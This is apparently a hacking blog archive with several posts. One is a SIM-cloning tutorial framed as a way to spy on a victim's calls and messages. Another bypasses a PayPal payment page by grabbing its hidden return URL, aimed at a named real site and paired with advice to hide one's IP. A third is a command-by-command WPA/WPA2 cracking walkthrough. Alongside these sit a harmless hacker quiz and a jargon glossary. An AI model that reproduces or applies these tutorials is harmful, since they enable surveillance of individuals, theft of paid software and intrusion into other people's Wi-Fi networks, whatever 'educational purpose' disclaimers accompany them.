Saturday 6 December 2014

How to clone a sim

UMany of my friends asked me abt the cloning of sim , i mostely refused them by telling that its illigal bt somtymes it can be a weapon of survoing so m presenting selftested method for that.
Plz write me if its not working...
How to clone sim card.
By cloning sim card , you can spy on victims call
and messages. So it will help you in Hacking.
.Requirements
1) Blank sim card available online as well as
offline.
2)A Sim card frimware writer (online as well as off
market)
3) woron scaner ( search it on google )
4) Sim emulator ( search it on google)
5)victims sim for 20minsSo here we start.
1- Plug victims sim and install woron scaner,
configure it and search IMSI number then search
ICC number and at last search KI number. Note
down this number.
2- Now remove victims sim. And insert blank sim.
3-Open sim emu , click on configurations tag and
enter IMSI ICC and Ki number of victim sim. The
number you enter should be in (country code)(10
digit number) format. Now click on Write to disc
button, a write EEPROM window will appear, name
it as supersim.HEX and save it.
4-Now run the writing task and click on done when
it is complete. So here we complete cloning
Note: COMP128V1 and V2 are cloneable. If it take
more then 45 min to scan KI number then it is not
cloneable
Note :- this tut is only for educational purpose this method is 100% safe and tasted

Tuesday 4 November 2014

Hacker's Test

 This test was conceived and written by Felix Lee, John Hayes and Angela Thomas. (Herewith a compendium of fact and folklore about computer hackerdom,  cunningly disguised as a test.)   Scoring - Count 1 for each item that you have done, or each           question that you can answer correctly.   If you score is between:                    You are             0x000 and 0x010       ->         Computer Illiterate            0x011 and 0x040       ->         a User            0x041 and 0x080       ->         an Operator            0x081 and 0x0C0       ->         a Nerd            0x0C1 and 0x100       ->         a Hacker            0x101 and 0x180       ->         a Guru            0x181 and 0x200       ->         a Wizard  Note: If you don't understand the scoring, stop here.  And now for the questions...  0001 Have you ever used a computer? 0002 ... for more than 4 hours continuously? 0003 ... more than 8 hours? 0004 ... more than 16 hours? 0005 ... more than 32 hours?  0006 Have you ever patched paper tape?  0007 Have you ever missed a class while programming? 0008 ... Missed an examination? 0009 ... Missed a wedding? 0010 ... Missed your own wedding?  0011 Have you ever programmed while intoxicated? 0012 ... Did it make sense the next day?  0013 Have you ever written a flight simulator?  0014 Have you ever voided the warranty on your equipment?  0015 Ever change the value of 4? 0016 ... Unintentionally? 0017 ... In a language other than Fortran?  0018 Do you use DWIM to make life interesting?  0019 Have you named a computer?  0020 Do you complain when a "feature" you use gets fixed?  0021 Do you eat slime-molds?  0022 Do you know how many days old you are?  0023 Have you ever wanted to download pizza?  0024 Have you ever invented a computer joke? 0025 ... Did someone not 'get' it?  0026 Can you recite Jabberwocky? 0027 ... Backwards?  0028 Have you seen "Donald Duck in Mathemagic Land"?  0029 Have you seen "Tron"?  0030 Have you seen "Wargames"?  0031 Do you know what ASCII stands for? 0032 ... EBCDIC?  0033 Can you read and write ASCII in hex or octal? 0034 Do you know the names of all the ASCII control codes?  0035 Can you read and write EBCDIC in hex?  0036 Can you convert from EBCDIC to ASCII and vice versa?  0037 Do you know what characters are the same in both ASCII and EBCDIC?  0038 Do you know maxint on your system?  0039 Ever define your own numerical type to get better precision?  0040 Can you name powers of two up to 2**16 in arbitrary order? 0041 ... up to 2**32? 0042 ... up to 2**64?  0043 Can you read a punched card, looking at the holes? 0044 ... feeling the holes?  0045 Have you ever patched binary code? 0046 ... While the program was running?  0047 Have you ever used program overlays?  0048 Have you met any IBM vice-president? 0049 Do you know Dennis, Bill, or Ken?  0050 Have you ever taken a picture of a CRT? 0051 Have you ever played a videotape on your CRT?  0052 Have you ever digitized a picture?  0053 Did you ever forget to mount a scratch monkey?  0054 Have you ever optimized an idle loop?  0055 Did you ever optimize a bubble sort?  0056 Does your terminal/computer talk to you?  0057 Have you ever talked into an acoustic modem? 0058 ... Did it answer?  0059 Can you whistle 300 baud? 0060 ... 1200 baud?  0061 Can you whistle a telephone number?  0062 Have you witnessed a disk crash? 0063 Have you made a disk drive "walk"?  0064 Can you build a puffer train? 0065 ... Do you know what it is?  0066 Can you play music on your line printer? 0067 ... Your disk drive? 0068 ... Your tape drive?  0069 Do you have a Snoopy calendar? 0070 ... Is it out-of-date?  0071 Do you have a line printer picture of... 0072 ... the Mona Lisa? 0073 ... the Enterprise? 0074 ... Einstein? 0075 ... Oliver? 0076 Have you ever made a line printer picture?  0077 Do you know what the following stand for? 0078 ... DASD 0079 ... Emacs 0080 ... ITS 0081 ... RSTS/E 0082 ... SNA 0083 ... Spool 0084 ... TCP/IP       Have you ever used 0085 ... TPU? 0086 ... TECO? 0087 ... Emacs? 0088 ... ed? 0089 ... vi? 0090 ... Xedit (in VM/CMS)? 0091 ... SOS? 0092 ... EDT? 0093 ... Wordstar?  0094 Have you ever written a CLIST?       Have you ever programmed in 0095 ... the X windowing system? 0096 ... CICS?  0097 Have you ever received a Fax or a photocopy of a floppy?  0098 Have you ever shown a novice the "any" key? 0099 ... Was it the power switch?       Have you ever attended 0100 ... Usenix? 0101 ... DECUS? 0102 ... SHARE? 0103 ... SIGGRAPH? 0104 ... NetCon?  0105 Have you ever participated in a standards group?  0106 Have you ever debugged machine code over the telephone?  0107 Have you ever seen voice mail? 0108 ... Can you read it?  0109 Do you solve word puzzles with an on-line dictionary?  0110 Have you ever taken a Turing test? 0111 ... Did you fail?  0112 Ever drop a card deck? 0113 ... Did you successfully put it back together? 0114 ... Without looking?  0115 Have you ever used IPCS?  0116 Have you ever received a case of beer with your computer?  0117 Does your computer come in 'designer' colors?  0118 Ever interrupted a UPS?  0119 Ever mask an NMI?  0120 Have you ever set off a Halon system? 0121 ... Intentionally? 0122 ... Do you still work there?  0123 Have you ever hit the emergency power switch? 0124 ... Intentionally?  0125 Do you have any defunct documentation? 0126 ... Do you still read it?  0127 Ever reverse-engineer or decompile a program? 0128 ... Did you find bugs in it?  0129 Ever help the person behind the counter with their terminal/computer?  0130 Ever tried rack mounting your telephone?  0131 Ever thrown a computer from more than two stories high?  0132 Ever patched a bug the vendor does not acknowledge?  0133 Ever fix a hardware problem in software? 0134 ... Vice versa?  0135 Ever belong to a user/support group?  0136 Ever been mentioned in Computer Recreations?  0137 Ever had your activities mentioned in the newspaper? 0138 ... Did you get away with it?  0139 Ever engage a drum brake while the drum was spinning?  0140 Ever write comments in a non-native language?  0141 Ever physically destroy equipment from software?  0142 Ever tried to improve your score on the Hacker Test?  0143 Do you take listings with you to lunch? 0144 ... To bed?  0145 Ever patch a microcode bug? 0146 ... around a microcode bug?  0147 Can you program a Turing machine?  0148 Can you convert postfix to prefix in your head?  0149 Can you convert hex to octal in your head?  0150 Do you know how to use a Kleene star?  0151 Have you ever starved while dining with philosophers?  0152 Have you solved the halting problem? 0153 ... Correctly?  0154 Ever deadlock trying eating spaghetti?  0155 Ever written a self-reproducing program?  0156 Ever swapped out the swapper?  0157 Can you read a state diagram? 0158 ... Do you need one?  0159 Ever create an unkillable program? 0160 ... Intentionally?  0161 Ever been asked for a cookie?  0162 Ever speed up a system by removing a jumper?       * Do you know...  0163 Do you know who wrote Rogue? 0164 ... Rogomatic?  0165 Do you know Gray code?  0166 Do you know what HCF means? 0167 ... Ever use it? 0168 ... Intentionally?  0169 Do you know what a lace card is? 0170 ... Ever make one?  0171 Do you know the end of the epoch? 0172 ... Have you celebrated the end of an epoch? 0173 ... Did you have to rewrite code?  0174 Do you know the difference between DTE and DCE?  0175 Do you know the RS-232C pinout? 0176 ... Can you wire a connector without looking?       * Do you have...  0177 Do you have a copy of Dec Wars? 0178 Do you have the Canonical Collection of Lightbulb Jokes? 0179 Do you have a copy of the Hacker's dictionary? 0180 ... Did you contribute to it?  0181 Do you have a flowchart template? 0182 ... Is it unused?  0183 Do you have your own fortune-cookie file?  0184 Do you have the Anarchist's Cookbook? 0185 ... Ever make anything from it?  0186 Do you own a modem? 0187 ... a terminal? 0188 ... a toy computer? 0189 ... a personal computer? 0190 ... a minicomputer? 0191 ... a mainframe? 0192 ... a supercomputer? 0193 ... a hypercube? 0194 ... a printer? 0195 ... a laser printer? 0196 ... a tape drive? 0197 ... an outmoded peripheral device?  0198 Do you have a programmable calculator? 0199 ... Is it RPN?  0200 Have you ever owned more than 1 computer? 0201 ... 4 computers? 0202 ... 16 computers?  0203 Do you have a SLIP line? 0204 ... a T1 line?  0205 Do you have a separate phone line for your terminal/computer? 0206 ... Is it legal?  0207 Do you have core memory? 0208 ... drum storage? 0209 ... bubble memory?  0210 Do you use more than 16 megabytes of disk space? 0211 ... 256 megabytes? 0212 ... 1 gigabyte? 0213 ... 16 gigabytes? 0214 ... 256 gigabytes? 0215 ... 1 terabyte?  0216 Do you have an optical disk/disk drive?  0217 Do you have a personal magnetic tape library? 0218 ... Is it unlabelled?  0219 Do you own more than 16 floppy disks? 0220 ... 64 floppy disks? 0221 ... 256 floppy disks? 0222 ... 1024 floppy disks?  0223 Do you have any 8-inch disks?  0224 Do you have an internal stack?  0225 Do you have a clock interrupt?  0226 Do you own volumes 1 to 3 of _The Art of Computer Programming_? 0227 ... Have you done all the exercises? 0228 ... Do you have a MIX simulator? 0229 ... Can you name the unwritten volumes?  0230 Can you quote from _The Mythical Man-month_? 0231 ... Did you participate in the OS/360 project?  0232 Do you have a TTL handbook?  0233 Do you have printouts more than three years old?       * Career  0234 Do you have a job? 0235 ... Have you ever had a job? 0236 ... Was it computer-related?  0237 Do you work irregular hours?  0238 Have you ever been a system administrator?  0239 Do you have more megabytes than megabucks?  0240 Have you ever downgraded your job to upgrade your processing power?  0241 Is your job secure? 0242 ... Do you have code to prove it?  0243 Have you ever had a security clearance?       * Games  0244 Have you ever played Pong?       Have you ever played 0246 ... Spacewar? 0247 ... Star Trek? 0248 ... Wumpus? 0249 ... Lunar Lander? 0250 ... Empire?       Have you ever beaten 0251 ... Moria 4.8? 0252 ... Rogue 3.6? 0253 ... Rogue 5.3? 0254 ... Larn? 0255 ... Hack 1.0.3? 0256 ... Nethack 2.4?  0257 Can you get a better score on Rogue than Rogomatic?  0258 Have you ever solved Adventure? 0259 ... Zork?  0260 Have you ever written any redcode?  0261 Have you ever written an adventure program? 0262 ... a real-time game? 0263 ... a multi-player game? 0264 ... a networked game?  0265 Can you out-doctor Eliza?       * Hardware  0266 Have you ever used a light pen? 0267 ... did you build it?       Have you ever used 0268 ... a teletype? 0269 ... a paper tape? 0270 ... a decwriter? 0271 ... a card reader/punch? 0272 ... a SOL?       Have you ever built 0273 ... an Altair? 0274 ... a Heath/Zenith computer?       Do you know how to use 0275 ... an oscilliscope? 0276 ... a voltmeter? 0277 ... a frequency counter? 0278 ... a logic probe? 0279 ... a wirewrap tool? 0280 ... a soldering iron? 0281 ... a logic analyzer?  0282 Have you ever designed an LSI chip? 0283 ... has it been fabricated?  0284 Have you ever etched a printed circuit board?       * Historical  0285 Have you ever toggled in boot code on the front panel? 0286 ... from memory?  0287 Can you program an Eniac?  0288 Ever seen a 90 column card?       * IBM  0289 Do you recite IBM part numbers in your sleep? 0290 Do you know what IBM part number 7320154 is?  0291 Do you understand 3270 data streams?  0292 Do you know what the VM privilege classes are?  0293 Have you IPLed an IBM off the tape drive? 0294 ... off a card reader?  0295 Can you sing something from the IBM Songbook?       * Languages  0296 Do you know more than 4 programming languages? 0297 ... 8 languages? 0298 ... 16 languages? 0299 ... 32 languages?  0300 Have you ever designed a programming language?  0301 Do you know what Basic stands for? 0302 ... Pascal?  0303 Can you program in Basic? 0304 ... Do you admit it?  0305 Can you program in Cobol? 0306 ... Do you deny it?  0307 Do you know Pascal? 0308 ... Modula-2? 0309 ... Oberon? 0310 ... More that two Wirth languages? 0311 ... Can you recite a Nicklaus Wirth joke?  0312 Do you know Algol-60? 0313 ... Algol-W? 0314 ... Algol-68? 0315 ... Do you understand the Algol-68 report? 0316 ... Do you like two-level grammars?  0317 Can you program in assembler on 2 different machines? 0318 ... on 4 different machines? 0319 ... on 8 different machines?       Do you know 0320 ... APL? 0321 ... Ada? 0322 ... BCPL? 0323 ... C++? 0324 ... C? 0325 ... Comal? 0326 ... Eiffel? 0327 ... Forth? 0328 ... Fortran? 0329 ... Hypertalk? 0330 ... Icon? 0331 ... Lisp? 0332 ... Logo? 0333 ... MIIS? 0334 ... MUMPS? 0335 ... PL/I? 0336 ... Pilot? 0337 ... Plato? 0338 ... Prolog? 0339 ... RPG? 0340 ... Rexx (or ARexx)? 0341 ... SETL? 0342 ... Smalltalk? 0343 ... Snobol? 0344 ... VHDL? 0345 ... any assembly language?  0346 Can you talk VT-100? 0347 ... Postscript? 0348 ... SMTP? 0349 ... UUCP? 0350 ... English?       * Micros  0351 Ever copy a copy-protected disk? 0352 Ever create a copy-protection scheme?  0353 Have you ever made a "flippy" disk?  0354 Have you ever recovered data from a damaged disk?  0355 Ever boot a naked floppy?       * Networking  0356 Have you ever been logged in to two different timezones at once?  0357 Have you memorized the UUCP map for your country? 0358 ... For any country?  0359 Have you ever found a sendmail bug? 0360 ... Was it a security hole?  0361 Have you memorized the HOSTS.TXT table? 0362 ... Are you up to date?  0363 Can you name all the top-level nameservers and their addresses?  0364 Do you know RFC-822 by heart? 0365 ... Can you recite all the errors in it?  0366 Have you written a Sendmail configuration file? 0367 ... Does it work? 0368 ... Do you mumble "defocus" in your sleep?  0369 Do you know the max packet lifetime?       * Operating systems       Can you use 0370 ... BSD Unix? 0371 ... non-BSD Unix? 0372 ... AIX 0373 ... VM/CMS? 0374 ... VMS? 0375 ... MVS? 0376 ... VSE? 0377 ... RSTS/E? 0378 ... CP/M? 0379 ... COS? 0380 ... NOS? 0381 ... CP-67? 0382 ... RT-11? 0383 ... MS-DOS? 0384 ... Finder? 0385 ... PRODOS? 0386 ... more than one OS for the TRS-80? 0387 ... Tops-10? 0388 ... Tops-20? 0389 ... OS-9? 0390 ... OS/2? 0391 ... AOS/VS? 0392 ... Multics? 0393 ... ITS? 0394 ... Vulcan?  0395 Have you ever paged or swapped off a tape drive? 0396 ... Off a card reader/punch? 0397 ... Off a teletype? 0398 ... Off a networked (non-local) disk?  0399 Have you ever found an operating system bug? 0400 ... Did you exploit it? 0401 ... Did you report it? 0402 ... Was your report ignored?  0403 Have you ever crashed a machine? 0404 ... Intentionally?       * People  0405 Do you know any people? 0406 ... more than one? 0407 ... more than two?       * Personal  0408 Are your shoelaces untied?  0409 Do you interface well with strangers?  0410 Are you able to recite phone numbers for half-a-dozen computer systems         but unable to recite your own?  0411 Do you log in before breakfast?  0412 Do you consume more than LD-50 caffeine a day?  0413 Do you answer either-or questions with "yes"?  0414 Do you own an up-to-date copy of any operating system manual? 0415 ... *every* operating system manual?  0416 Do other people have difficulty using your customized environment?  0417 Do you dream in any programming languages?  0418 Do you have difficulty focusing on three-dimensional objects?  0419 Do you ignore mice?  0420 Do you despise the CAPS LOCK key?  0421 Do you believe menus belong in restaurants?  0422 Do you have a Mandelbrot hanging on your wall?  0423 Have you ever decorated with magnetic tape or punched cards? 0424 Do you have a disk platter or a naked floppy hanging in your home?  0425 Have you ever seen the dawn? 0426 ... Twice in a row?  0427 Do you use "foobar" in daily conversation? 0428 ... "bletch"?  0429 Do you use the "P convention"?  0430 Do you automatically respond to any user question with RTFM? 0431 ... Do you know what it means?  0432 Do you think garbage collection means memory management?  0433 Do you have problems allocating horizontal space in your room/office?  0434 Do you read Scientific American in bars to pick up women?  0435 Is your license plate computer-related?  0436 Have you ever taken the Purity test?  0437 Ever have an out-of-CPU experience?  0438 Have you ever set up a blind date over the computer?  0439 Do you talk to the person next to you via computer?       * Programming  0440 Can you write a Fortran compiler? 0441 ... In TECO?  0442 Can you read a machine dump? 0443 Can you disassemble code in your head?       Have you ever written 0444 ... a compiler? 0445 ... an operating system? 0446 ... a device driver? 0447 ... a text processor? 0448 ... a display hack? 0449 ... a database system? 0450 ... an expert system? 0451 ... an edge detector? 0452 ... a real-time control system? 0453 ... an accounting package? 0454 ... a virus? 0455 ... a prophylactic?  0456 Have you ever written a biorhythm program? 0457 ... Did you sell the output? 0458 ... Was the output arbitrarily invented?  0459 Have you ever computed pi to more than a thousand decimal places? 0460 ... the number e?  0461 Ever find a prime number of more than a hundred digits?  0462 Have you ever written self-modifying code? 0463 ... Are you proud of it?  0464 Did you ever write a program that ran correctly the first time? 0465 ... Was it longer than 20 lines? 0466 ... 100 lines? 0467 ... Was it in assembly language? 0468 ... Did it work the second time?  0469 Can you solve the Towers of Hanoi recursively? 0470 ... Non-recursively? 0471 ... Using the Troff text formatter?  0472 Ever submit an entry to the Obfuscated C code contest? 0473 ... Did it win? 0474 ... Did your entry inspire a new rule?  0475 Do you know Duff's device?  0476 Do you know Jensen's device?  0477 Ever spend ten minutes trying to find a single-character error? 0478 ... More than an hour? 0479 ... More than a day? 0480 ... More than a week? 0481 ... Did the first person you show it to find it immediately?       * Unix  0482 Can you use Berkeley Unix? 0483 .. Non-Berkeley Unix?  0484 Can you distinguish between sections 4 and 5 of the Unix manual?  0485 Can you find TERMIO in the System V release 2 documentation?  0486 Have you ever mounted a tape as a Unix file system?  0487 Have you ever built Minix?  0488 Can you answer "quiz function ed-command" correctly? 0489 ... How about "quiz ed-command function"?       * Usenet  0490 Do you read news? 0491 ... More than 32 newsgroups? 0492 ... More than 256 newsgroups? 0493 ... All the newsgroups?  0494 Have you ever posted an article? 0495 ... Do you post regularly?  0496 Have you ever posted a flame? 0497 ... Ever flame a cross-posting? 0498 ... Ever flame a flame? 0499 ... Do you flame regularly?  0500 Ever have your program posted to a source newsgroup?  0501 Ever forge a posting? 0502 Ever form a new newsgroup? 0503 ... Does it still exist?  0504 Do you remember 0505 ... mod.ber? 0506 ... the Stupid People's Court? 0507 ... Bandy-grams?       * Phreaking  0508 Have you ever built a black box?  0509 Can you name all of the 'colors' of boxes? 0510 ... and their associated functions?  0511 Does your touch tone phone have 16 DTMF buttons on it?  0512 Did the breakup of MaBell create more opportunities for you?   If you have any comments of suggestions regarding the HACKER TEST, Please send then krrishna.patil@gmail.com

Download from a paypal site without paying a penny!

Just a little basic html tip for those who are trying to download an application from sites which has an paypal order page & link to start you off.

Use a proxy when you try this to hide your ip as some sites will record your ip when you connect for security.

1) Rightclick your mouse (ctrl+click) viewsource and open the source of the site in an a texteditor
2) Search for the word "return"
3) Next to it you can find the url for the thank you page
4) Copy the url and paste it in your browser and you will see the download link

This works only if you can download instantly after payment, it will not work if the link needs to be emailed to you.

You can try it here to start with:
Code:
http://www.ramphelp.com/halfpipe.html


About half way down the page you will find:

<input type="hidden" name="return" value="http://www.ramphelp.com/65984523/thanks/68912hp654/26865thankyouhp08363215423.html ">

Copy the link into your browser and download.

Note:- this post is for only information and educational purpose

Monday 22 September 2014

WPA/WPA2 cracking with Back|Track 5

WPA/WPA2 cracking with Back|Track 5

Warning:- This tut is only for educational purpose ...



(A) General Display card

Step 1 :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]


Step 2 :

airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step 4 :

airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step 5 :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
           -w is the file to be written
           --bssid is the BSSID

This terminal is keeping running.

Step 6 :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step 7 :

Use the John the Ripper as word list to crack the WPA/WP2 password.

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :

If you do not want to use John the Ripper as word list, you can use Crunch.

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

(B) nVidia Display Card with CUDA

If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.

Step a :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]


Step b :

airmon-ng start wlan0

Step c (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step d :

airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step e :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

Step f :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step g :

If the following programs are not yet installed, please do it.

apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h :

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

Step i :

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install

Step j :

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step k (Optional) :

If you encounter error when reading the wpacrack-01.cap, you should do the following step.

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step l :

Then, you will see something similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.

Remarks :

If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.

To test if your wireless card (either USB or PCI-e) can do the injection or not :

airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0

Make sure pyrit workable on your system :

pyrit list_cores

That's all! See you.

Wednesday 25 June 2014

                    A Short 'HACKERSPEAK' Glossary
                              
 -
   A reference to a few of the terms used by many computer hackers.
                                 -
  ()
                                 -

arg - (argh) noun.  An argument, in the mathematical sense.

automagically - adverb.  Automatically, but in a way which, for some
reason (for example, because it's too complicated or too trivial) the
speaker doesn't feel like explaining.

bells and whistles - n.  Unnecessary (but often convenient, useful,
good-looking, or amusing) features of a program or other object. Added
to a bare-bones, working program.

bit - n.  1) A unit of information obtained by asking a question (e.g.
- 'I need a few bits about Punter protocol')  2) A mental flag;
reminder that something should be done eventually.

buffer - verb.  The act of saving or setting aside something to be done
later.  (e.g. - 'I'm going to buffer that and go eat now').

bug - n.  A problem or mistake; unwanted property or side effect.
Usually of a program, but can refer to a person.  Can be very simple or
very complicated.  Antonym: FEATURE.

bum - v.  To improve something by rearranging or removing its parts.
Most often done to a program to increase speed or save memory space,
usually at the expense of clarity.

buzz - v.  Of a program, to run without visible progress or certainty
of finishing.  Resembles CATATONIA except that a buzzing loop may
eventually end.

can
c22
onical - (ki NAHN i kil) adjective.  Standard, usual or ordinary way
of doing something.

catatonia - n.  A condition in which something is supposed to happen,
but nothing does.  (e.g. - Nothing you type will appear on the screen.
It's catatonic.  Often means a CRASH has occured.)

crash - 1) n.  Sudden, drastic failure.  Usually refers to a complete
computer system or program.  2) v.  To fail suddenly or cause to fail.
3) v.  Of people, to go to sleep.

creeping featurism - n.  Tendency for anything complicated to become
even more so because people keep saying, 'Hey, it would be terrific if
the program had this feature, and could do this, and...'  The result is
a patchwork program, confusing to read, with a lot of 'neat' features.

crock - n.  Said of a program that works, but in an extremely awkward
or cumbersome manner.

crunch - v.  To process, usually in a time-consuming, complex way.
Example:  Performing large, repetitive numerical computations is called
'number crunching'.  2) v.  To reduce the size of a file (often in a
complicated way) to save space.

dec'ed out - (decked out) adj.  Stoned, drunk (and possibly trying to
program, regardless).  Uncomplimentary.  Derives from the 65-- series
ML opcode DECrement, i.e.: decrease a value.

elegant - adj.  Said of a piece of code that does the RIGHT THING in a
way beautiful to look at.

feature - n.  An extra property or behaviour added to a program that
already does the job.  May or may not be useful, necessary or
convenient.

fencepost error - n.  A mathematical 'off-by-one' error.  Most often
found in programs that must count loops (it will count one time too
many, or too few).  Term comes from the problem:  'If you build a fence
100 feet long with posts 10 feet apart, how many posts fo you need?'
Example:  Suppose you want to process an array of items x thru y.  How
many are there?  The correct answer is x-y+1 (not x-y, which would be
off by one).

flavor - n. variety, kind, type.  (flavorful - adj.  Aesthetically
pleasing).

flush - v.  To scratch, delete or destroy something.  Often something
superfluous or useless.

fudge - v.  Perform in an incomplete, but marginally acceptable way.
'I fudged it, so it works.'

GC - (jee see) 1) v.  To clean up, throw away useless things.  2) To
forget.  GC is an abreviation of the term 'Garbage Collection', the
common method of freeing up memory space.

glitch - n.  Sudden interruption in electrical service, common sense,
or program function.  Usually happens only when you pray that it
doesn't.

grovel - v.  To work interminably, examine minutely or in extreme
detail.

gun - v.  To forcibly terminate a program.  'It was a boring display,
so I gunned it.'

hack - n.  An appropriate application of ingenuity.  It could be a
quick-and-dirty bug fix, or a time-consuming and elegant work of art.
A clever technique.

hack value - n.  The motivation for expending effort and time toward a
seemingly pointless goal, the point being the resulting hack.

hack attack - n.  Period of greatly increased hacking activity.  Not to
be
d2a
 confused with a Mac-Attack.

hacker - n.  1) One who greatly enjoys learning the details of a
computer system and how to stretch their capabilities (as opposed to
REAL USERS who learn only the minimum amount necessary).  2) One who
programs enthusiastically, rather than just theorizing about it.  3)
One capable of appreciating HACK VALUE.  4) An expert of any kind  5) A
malicious or inquisitive meddler (in the case of a 'system hacker' or a
'password hacker').

inc it up - (also 'incing') v.  Specifically related to studying,
reading, or learning ML.  Derives from the 65-- series ML instruction
INCrement a value; i.e. increase it.

jock - n.  Programmer characterized by the large, cumbersome,
brute-force programs he/she writes.  The programs may work, but slowly,
inelegantly, or in an ugly way.

kludge - (kloog)  1) n.  Clever programming trick, most often to fix a
bug.  Efficient, but maybe unclear.  2) v.  To insert a kludge into a
program (to fix a bug or add a feature).

magic - adj.  Something as yet unexplained or too complex to imagine.

M&M's - n.  Mental and Midget; i.e. Mental Midget.  Uncomplimentary
term applied most often to 'system hackers' who intrude for disruptive
or destructive purposes (like to crash BBS's).

misfeature - n.  A FEATURE that eventually turns out to be more trouble
than it was worth, possibly because it is inadequate for a new user or
situation that has evolved.  Misfeatures are different from bugs or
side-effects in that they are often more basic to the program design
and, at one time, were carefully planned.

moby - 1) adj.  Immense, complex, or impressive.  2) n.  Total size of
a computers address space.

mode - n.  A general state.  Examples:  DAY MODE - state a person is in
when s/he is working days and sleeping nights.

mumble - interjection.  Said when the correct response is too
complicated to put into words or has not been thought out.  Can
indicate a reluctance to enter a long discussion.

mumblage - n.  The subject matter of one's mumbling.  Replaces 'all
that stuff'.

nop around (or nopping) - v.  Hanging out; not doing much; not
programming.  Derives from the 65-- series ML instruction code 'NOP'
(No OPeration).

obie (or o.b.) - n.  Derives from a pun with the word 'OverByte'.
Usually relates to a ML routine that doesn't work because of some
small mistake, possibly an incorrect addressing mode or even a typing
error.  Most often one or two bytes wrong.

patch - 1) n.  Piece of code intended as a quick-and-dirty remedy to a
BUG or MISFEATURE.  2) v.  To fix something temporarily; insert a patch
into a piece of code; make the main program machine-specific.

punt - v.  To give up; decide not to do.

rave - v.  1) To persist in discussing something.  2) To speak
authoritatively about that which one knows very little.  3) To
proselytize.

real user - n.  A commercial user; a non-hacker who uses computer
applications only.

Real World, The - n.  1) Places where programs have only business
applications.  2) Institutions such as IBM.  3) The location of
non-programmers and non-programming activity.  The first two
definitions are uncomplimentary; the third is not.

Right Thing, The - n.  that which is obviously the appropriate thing to
use, do, say, etc.

rude - (rood or roo-day) adj.  Programs badly written or functionally
poor.


5a3
sacred - adj.  Reserved for the exclusive use of something.  Usually
refers to memory location or register that shouldn't be used because
what is stored there must not change.

slurp - v.  To read a large data file into memory before using or
processing data.

smart - adj.  Said of a program (or something) that does THE RIGHT
THING.

SMOP - n.  An acronym for a 'Small Matter Of Programming'.  A piece of
code that would not at all be hard to write, but would take a very long
time because of its size.  Not worth the trouble.

snail mail - n.  Mail sent via Post Office, rather than electronically.

software rot - n.  Hypothetical disease that causes working programs to
stop working when unused for a period of time.

tense - adj.  Of programs, very clever and efficient.  A tense
programmer produces tense code.

vanilla - adj.  Standard, usual, or ordinary FLAVOR.

zero - v.  1) To set a bit or variable to zero.  2) To erase, or
discard all data from.

zorch - v.  1) To move quickly.  2) Influences.  3) Energy or ability.

                                                                                                                                                                                                                                                                                                                                                                                 Destroyer The King